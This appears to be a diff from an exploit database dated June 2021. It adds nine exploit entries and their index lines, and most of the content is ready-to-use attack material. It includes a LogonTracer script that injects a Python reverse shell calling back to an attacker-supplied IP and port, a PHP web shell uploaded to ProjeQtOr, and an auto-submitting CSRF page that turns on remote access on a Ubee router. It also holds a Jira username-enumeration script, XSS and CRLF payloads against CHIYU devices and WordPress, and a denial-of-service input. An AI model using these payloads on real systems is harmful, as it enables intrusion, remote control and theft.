DB: 2021-06-02

9 changes to exploits/shellcodes

DupTerminator 1.4.5639.37199 - Denial of Service (PoC)

Veyon 4.4.1 - 'VeyonService' Unquoted Service Path
LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
ProjeQtOr Project Management 9.1.4 - Remote Code Execution
Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)
WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)
CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
CHIYU TCP/IP Converter devices - CRLF injection
Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)

exploits/cgi/webapps/49922.txt

@@ -0,0 +1,193 @@
+# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
+# Date: May 31 2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version: BF-430,  BF-431,  BF-450M,  BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
+# Tested on: BF-430,  BF-431,  BF-450M,  BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
+# CVE:  CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
+
+#1:  Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
+CVE ID: CVE-2021-31250
+CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
+
+============= PoC 01 ===============
+Affected parameter: TF_submask
+Component: if.cgi
+Payload: "><script>alert(123)</script>
+
+HTTP Request:
+GET
+/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.12/ap_tcps.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+  1. Navigate to the vulnerable device
+  2. Make a GET request to component mentioned (if.cgi)
+  3. Append the payload at the end of the vulnerable parameter (TF_submask)
+  4. Submit the request and observe payload execution
+
+  ============= PoC 02 ===============
+Affected parameter: TF_hostname=Component: dhcpc.cgi
+Payload: /"><img src="#">
+HTTP request and response:
+
+HTTP Request:
+GET
+/dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.12/wan_dc.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+  1. Navigate to the vulnerable device
+  2. Make a GET request to component mentioned (dhcpc.cgi)
+  3. Append the payload at the end of the vulnerable parameter (TF_hostname)
+  4. Submit the request and observe payload execution
+
+  ============= PoC 03 ===============
+Affected parameter: TF_servicename=Component: ppp.cgi
+Payload: "><script>alert(123)</script>
+
+GET
+/ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.143
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.143/wan_pe.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+  1. Navigate to the vulnerable device
+  2. Make a GET request to component mentioned (ppp.cgi)
+  3. Append the payload at the end of the vulnerable parameter
+(TF_servicename)
+  4. Submit the request and observe payload execution
+
+============= PoC 04 ===============
+Affected parameter: TF_port=Component: man.cgi
+Payload: /"><img src="#">
+
+GET
+/man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.12/manage.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+  1. Navigate to the vulnerable device
+  2. Make a GET request to component mentioned (man.cgi)
+  3. Append the payload at the end of the vulnerable parameter (TF_port)
+  4. Submit the request and observe payload execution
+
+
+
+#2:  Unauthenticated XSS in several CHIYU IoT devices
+CVE ID: CVE-2021-31641
+Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641
+
+
+Component: any argument passed via URL that results in an HTTP-404
+Payload: http://ip/<script>alert(123)</script>
+
+
+Steps to reproduce:
+  1. Navigate to the webpage of the vulnerable device
+  2. On the web-browsers, you need to append the payload after the IP
+address (see payload above)
+  3. Submit the request and observe payload execution
+
+
+#3:  Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
+CVE ID: CVE-2021-31643
+Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643
+
+Affected parameter: username=
+Component: if.cgi
+Payload: "><script>alert(1)</script>
+
+HTTP request - SEMAC Web Ver7.2
+
+GET
+/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://127.0.0.1/EmpRcd.htm
+Cookie: fresh=; remote=00000000
+Upgrade-Insecure-Requests: 1
+
+
+HTTP request - BIOSENSE-III-COMBO(M1)(20000)
+
+GET
+/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110
+HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
+Gecko/20100101 Firefox/87.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
+Accept-Encoding: gzip, deflate
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: close
+Referer: http://127.0.0.1/EmpRcd.htm
+Cookie: fresh=
+Upgrade-Insecure-Requests: 1
+
+
+Steps to reproduce:
+  1. Navigate to the vulnerable device
+  2. Make a GET request to component mentioned (if.cgi)
+  3. Append the payload at the end of the vulnerable parameter (username)
+  4. Submit the request and observe payload execution

exploits/cgi/webapps/49923.txt

@@ -0,0 +1,48 @@
+# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection
+# Date: May 31 2021
+# Exploit Author: sirpedrotavares
+# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
+# Software Link: https://www.chiyu-tech.com/category-hardware.html
+# Version:  BF-430, BF-431, and BF-450M TCP/IP Converter devices   - all firmware versions < June 2021
+# Tested on:  BF-430, BF-431, and BF-450M
+# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
+
+Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.
+CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
+URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
+
+Affected parameter: redirect=Component: all the CGI components
+Payload: %0d%0a%0d%0a<script>alert(document.domain)</script>
+
+====HTTP request======
+GET
+/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY
+HTTP/1.1
+Host: 192.168.187.12
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.187.12/manage.htm
+Authorization: Basic OmFkbWlu
+Connection: close
+Upgrade-Insecure-Requests: 1
+
+======HTTP response========
+HTTP/1.1 302 Found
+Location: setting.htm
+<script>alert(document.domain)</script>
+Content-Length: 0
+Content-Type: text/html
+
+
+Steps to reproduce:
+  1. Navigate to the vulnerable device
+  2. Make a GET request to all CGI components
+  3. Append the payload at the end of the vulnerable parameter (redirect )
+  4. Submit the request and observe payload execution
+
+
+ Mitigation: The latest version of the CHIYU firmware should be installed
+to mitigate this vulnerability.

exploits/hardware/webapps/49920.html

@@ -0,0 +1,18 @@
+# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) 
+# Date: 2021-05-30
+# Exploit Author: lated
+# Vendor Homepage: https://www.ubeeinteractive.com
+# Version: EVW327
+
+<html>
+	<body>
+		<form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST">
+			<input type="hidden" name="RemoteAccessEnable" value="1"/>
+			<input type="hidden" name="RemoteAccessPort" value="8080"/>
+			<input type="hidden" name="ApplyRemoteEnableAction" value="1"/>
+		</form>
+		<script>
+			document.forms[0].submit();
+		</script>
+	</body>
+</html>

exploits/multiple/webapps/49918.py

@@ -0,0 +1,34 @@
+# Exploit Title: LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)
+# Date: 29/05/2021
+# Exploit Author: g0ldm45k
+# Vendor Homepage: https://www.jpcert.or.jp/
+# Software Link: https://github.com/JPCERTCC/LogonTracer/releases/tag/v1.2.0
+# Version: 1.2.0 and earlier
+# Tested on: Version 1.2.0 on Debian GNU/Linux 8 (jessie)
+# CVE : CVE-2018-16167
+
+import requests
+import argparse
+
+parser = argparse.ArgumentParser(description='Send a payload to a LogonTracer 1.2.0 (or earlier) server.')
+parser.add_argument('aip', type=str, help='Attacker ip')
+parser.add_argument('aport', type=str, help='Attacker port')
+parser.add_argument('victimurl', type=str, help='Victim URL minus the path.')
+
+args = parser.parse_args()
+
+ATTACKER_IP = args.aip
+ATTACKER_PORT = args.aport
+PAYLOAD = f"python -c 'import pty,socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{ATTACKER_IP}\",{ATTACKER_PORT}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"/bin/sh\")'"
+
+VICTIM_URL = args.victimurl
+VICTIM_ENDPOINT = "/upload"
+
+DATA = {
+    "logtype": "XML",
+    "timezone": f"1;{PAYLOAD};",
+}
+
+print("[!] Sending request... If your terminal hangs, you might have a shell!")
+requests.post(f"{VICTIM_URL}{VICTIM_ENDPOINT}", data=DATA)
+print("[*] Done. Did you get what you wanted?")

exploits/multiple/webapps/49924.py

@@ -0,0 +1,66 @@
+# Exploit Title: Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)
+# Date: 31/05/2021
+# Exploit Author: Mohammed Aloraimi
+# Vendor Homepage: https://www.atlassian.com/
+# Software Link: https://www.atlassian.com/software/jira
+# Vulnerable versions: version 8.11.x to 8.15.0
+# Tested on: Kali Linux
+# Proof Of Concept:
+
+'''
+A username information disclosure vulnerability exists in Atlassian JIRA from versions 8.11.x to 8.15.x. Unauthenticated users can ENUMRATE valid users via /secure/QueryComponent!Jql.jspa endpoint.
+
+Tested versions:
+
+Atlassian JIRA 8.11.1
+Atlassian JIRA 8.13
+Atlassian JIRA 8.15
+'''
+
+#!/usr/bin/env python
+
+__author__  = "Mohammed Aloraimi (@ixSly)"
+
+
+
+import requests
+import sys
+import re
+import urllib3
+urllib3.disable_warnings()
+
+
+def help():
+    print('python script.py <target> <username>')
+    print('e.g. python script.py https://jiratarget.com admin')
+    sys.exit()
+
+if len(sys.argv) < 3:
+  help()
+
+
+
+def pwn(url,username):
+
+        try:
+                headers = {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"}
+                data="jql=creator+in+({})&decorator=none".format(username)
+                req = requests.post(url+"/secure/QueryComponent!Jql.jspa",headers=headers,verify=False,data=data)
+                if "issue.field.project" in req.text and req.status_code == 200:
+                        print("[+] {} is a Valid User".format(username))
+                        userFullName=re.search('value=\"user:{}\" title=\"(.+?)\"'.format(username),str(req.json()["values"]["creator"]).strip())
+                        if userFullName:
+                                print("[+] User FullName: " + userFullName.group(1))
+                elif '["jqlTooComplex"]' in req.text and req.status_code == 401:
+                        print("[-] {} is not a Valid User".format(username))
+                else:
+                        print("[-] Error..")
+        except Exception as e:
+                print(str(e))
+                pass
+
+server = sys.argv[1]
+username = sys.argv[2]
+
+
+pwn(server,username)

exploits/php/webapps/49919.txt

@@ -0,0 +1,87 @@
+# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution
+# Date: 29.05.2021
+# Exploit Author: Temel Demir
+# Vendor Homepage: https://www.projeqtor.org
+# Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV9.1.4.zip
+# Version: v9.1.4
+# Tested on: Laragon @WIN10
+# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section. 
+
+PoC Process Step_by_Step:
+
+# 1) Create a file with the below php code and save it as demir.pHp
+
+<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
+
+# 2) Login to ProjeQtOr portal as guest user
+# 3) Click -profile- button on header panel.
+# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.
+# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )
+# 6) As a last step you have to add the ".projeqtor" statement to the file extension.
+You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor
+
+# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]
+
+
+
+Example Request:
+
+POST /project/tool/saveAttachment.php HTTP/1.1
+Host: ip:port
+Content-Length: 1196
+Accept: application/json
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Origin: http://ip:port/website_location/
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: cors
+Sec-Fetch-Dest: empty
+Referer: http://ip:port/website_location/view/main.php
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)
+Connection: close
+
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"
+Content-Type: application/octet-stream
+
+<?php echo shell_exec($_GET['key'].' 2>&1'); ?>
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentId"
+
+
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentRefType"
+
+User
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentRefId"
+
+($your_profile_id //edit)
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentType"
+
+file
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+10485760
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentLink"
+
+
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentDescription"
+
+
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="attachmentPrivacy"
+
+1
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ
+Content-Disposition: form-data; name="uploadType"
+
+html5
+------WebKitFormBoundaryEPEodMA4Ojb7pSuQ--

exploits/php/webapps/49921.txt

@@ -0,0 +1,17 @@
+# Exploit Title: WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)
+# Date: 2021-05-31
+# Exploit Author: Bastijn Ouwendijk
+# Vendor Homepage: http://goprayer.com/
+# Software Link: https://wordpress.org/plugins/wp-prayer/
+# Version: 1.6.1 and earlier
+# Tested on: Windows 10
+# Proof: https://bastijnouwendijk.com/cve-2021-24313/
+
+Steps to exploit this vulnerability:
+
+1. Log into the WordPress website with a user account, can be a user with any role
+2. Go to the page where prayer or praise request can be made and fill in the requested information
+3. In the 'prayer_messages' field of the prayer request form put the payload: <script>alert("XSS")</script>
+4. Submit the form
+5. Go to the page where the prayer requests are listed
+6. The prayer requests are loaded and an alert is shown with text 'XSS' in the browser

exploits/windows/dos/49917.py

@@ -0,0 +1,27 @@
+# Exploit Title: DupTerminator 1.4.5639.37199 - Denial of Service (PoC)
+# Date: 2021-05-28
+# Author: Brian Rodríguez
+# Software Site: https://sourceforge.net/projects/dupterminator/
+# Version: 1.4.5639.37199
+# Category: DoS (Windows)
+
+##### Vulnerability #####
+
+DupTerminator is vulnerable to a DoS condition when a long list of characters is being used in field "Excluded" text box.
+
+Successful exploitation will causes application stop working.
+
+I have been able to test this exploit against Windows 10.
+
+##### PoC #####
+
+#!/usr/bin/env python
+buffer = "\x41" * 8000
+
+try:
+    f = open("payload.txt","w")
+    f.write(buffer)
+    f.close()
+    print ("File created")
+except:
+    print ("File cannot be created")

exploits/windows/local/49925.txt

@@ -0,0 +1,41 @@
+# Exploit Title: Veyon 4.4.1 - 'VeyonService' Unquoted Service Path
+# Discovery by: Víctor García
+# Discovery Date: 2020-03-23
+# Vendor Homepage: https://veyon.io/
+# Software Link: https://github.com/veyon/veyon/releases/download/v4.4.1/veyon-4.4.1.0-win64-setup.exe
+# Tested Version: 4.4.1
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Pro x64
+# CVE: CVE-2020-15261
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i
+"auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
+Veyon Service     VeyonService     C:\Program Files\Veyon\veyon-service.exe
+
+
+# Service info:
+
+C:\>sc qc VeyonService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: VeyonService
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files\Veyon\veyon-service.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Veyon Service
+        DEPENDENCIES       : Tcpip
+                           : RpcSs
+        SERVICE_START_NAME : LocalSystem
+
+
+# Exploit:
+
+# A successful attempt would require the local user to be able to insert their code in the
+# system root path undetected by the OS or other security applications where it could
+# potentially be executed during application startup or reboot. If successful, the local
+# user's code would execute with the elevated privileges of the application.

files_exploits.csv

@@ -6784,6 +6784,7 @@ id,file,description,date,author,type,platform,port
 49883,exploits/ios/dos/49883.py,"WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC)",2021-05-19,"Luis Martínez",dos,ios,
 49898,exploits/windows/dos/49898.txt,"iDailyDiary 4.30 - Denial of Service (PoC)",2021-05-24,"Ismael Nava",dos,windows,
 49906,exploits/windows/dos/49906.py,"RarmaRadio 2.72.8 - Denial of Service (PoC)",2021-05-26,"Ismael Nava",dos,windows,
+49917,exploits/windows/dos/49917.py,"DupTerminator 1.4.5639.37199 - Denial of Service (PoC)",2021-06-01,"Brian Rodriguez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -11339,6 +11340,7 @@ id,file,description,date,author,type,platform,port
 49893,exploits/windows/local/49893.c++,"DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)",2021-05-21,"Paolo Stagno",local,windows,
 49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",2021-05-24,"Erick Galindo",local,windows,
 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",2021-05-24,"Emmanuel Lujan",local,windows,
+49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",2021-06-01,"Víctor García",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -44079,3 +44081,10 @@ id,file,description,date,author,type,platform,port
 49913,exploits/php/webapps/49913.py,"Trixbox 2.8.0.4 - 'lang' Remote Code Execution (Unauthenticated)",2021-05-28,"Ron Jost",webapps,php,
 49914,exploits/php/webapps/49914.py,"Trixbox 2.8.0.4 - 'lang' Path Traversal",2021-05-28,"Ron Jost",webapps,php,
 49915,exploits/linux/webapps/49915.rb,"Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)",2021-05-28,"Jon Stratton",webapps,linux,
+49918,exploits/multiple/webapps/49918.py,"LogonTracer 1.2.0 - Remote Code Execution (Unauthenticated)",2021-06-01,g0ldm45k,webapps,multiple,
+49919,exploits/php/webapps/49919.txt,"ProjeQtOr Project Management 9.1.4 - Remote Code Execution",2021-06-01,"Temel Demir",webapps,php,
+49920,exploits/hardware/webapps/49920.html,"Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF)",2021-06-01,lated,webapps,hardware,
+49921,exploits/php/webapps/49921.txt,"WordPress Plugin WP Prayer version 1.6.1 - 'prayer_messages' Stored Cross-Site Scripting (XSS) (Authenticated)",2021-06-01,"Bastijn Ouwendijk",webapps,php,
+49922,exploits/cgi/webapps/49922.txt,"CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)",2021-06-01,sirpedrotavares,webapps,cgi,
+49923,exploits/cgi/webapps/49923.txt,"CHIYU TCP/IP Converter devices - CRLF injection",2021-06-01,sirpedrotavares,webapps,cgi,
+49924,exploits/multiple/webapps/49924.py,"Atlassian Jira 8.15.0 - Information Disclosure (Username Enumeration)",2021-06-01,"Mohammed Aloraimi",webapps,multiple,